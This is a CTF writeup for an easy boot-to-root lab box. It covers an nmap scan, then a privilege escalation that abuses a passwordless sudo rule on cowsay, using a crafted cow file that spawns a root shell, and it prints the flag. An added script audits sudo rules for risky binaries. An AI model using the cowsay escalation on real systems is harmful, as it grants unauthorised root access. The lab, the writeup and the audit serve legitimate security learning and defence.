JI EPITA - CTF
Challenge Type : boot to root (box)
Difficulty : easy
Running the challenge.
You can run the challenge using docker.
With Docker Compose
cd docker
sudo docker compose up --build
Building and running the docker image
todo
Writeup
Enum
Scan the IP using nmap for open ports
nmap -p- ip
Ports 22 and 31337 are open.
We find that there is a web service on port 31337.
Foothold
...
Privesc
We can see that the user is allowed to run /usr/games/cowsay as root using sudo without a password.
User l33t may run the following commands on srv1prod:
(ALL) NOPASSWD: /usr/games/cowsay, /usr/bin/sudo -l
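Using GTFOBins, we identified that we can spawn a root shell thanks to this misconfiguration: cowsay's -f option loads a cow file, which is evaluated as Perl, so a crafted file runs with root privileges.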
https://gtfobins.github.io/gtfobins/cowsay/
TF=$(mktemp)
echo 'exec "/bin/sh";' >$TF
sudo cowsay -f $TF x
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
epita{th3-sup3r-c0ws4y}
Solved!
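From the defender's side, the sudo rule abused above can be caught by auditing `sudo -l` output. The script below is an added example, not part of the challenge repository; the watchlist, the function name `audit_sudo_l` and the last two sample lines are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: flag NOPASSWD sudo rules whose binary can execute
# caller-supplied code, as /usr/games/cowsay does through its -f option.

# Assumption: a short illustrative watchlist; extend it from the GTFOBins sudo entries.
RISKY_BINS="cowsay vim less find awk perl python3"

# Sample `sudo -l` output. The first two lines are the ones shown in the
# writeup; the last two are constructed for contrast.
SAMPLE='User l33t may run the following commands on srv1prod:
    (ALL) NOPASSWD: /usr/games/cowsay, /usr/bin/sudo -l
    (root) /usr/bin/systemctl status nginx
    (root) NOPASSWD: /usr/bin/less /var/log/syslog'

# Reads `sudo -l` output on stdin and prints "RISKY <command>" for every
# NOPASSWD command that is either ALL or a binary on the watchlist.
audit_sudo_l() {
  awk -v risky="$RISKY_BINS" '
    BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) bad[r[i]] = 1 }
    /NOPASSWD:/ {
      line = $0
      sub(/^.*NOPASSWD:[ \t]*/, "", line)   # keep only the command list
      m = split(line, cmds, /,[ \t]*/)      # one rule line can list several commands
      for (i = 1; i <= m; i++) {
        split(cmds[i], word, /[ \t]+/)      # word[1] is the binary, the rest are fixed args
        k = split(word[1], part, "/")       # part[k] is the basename
        if (word[1] == "ALL" || (part[k] in bad)) print "RISKY " word[1]
      }
    }'
}

# Run the audit over the sample; on a live host use: sudo -l | audit_sudo_l
printf '%s\n' "$SAMPLE" | audit_sudo_l
```

Any hit should be removed from sudoers or replaced with a wrapper that accepts no user-controlled file or option arguments.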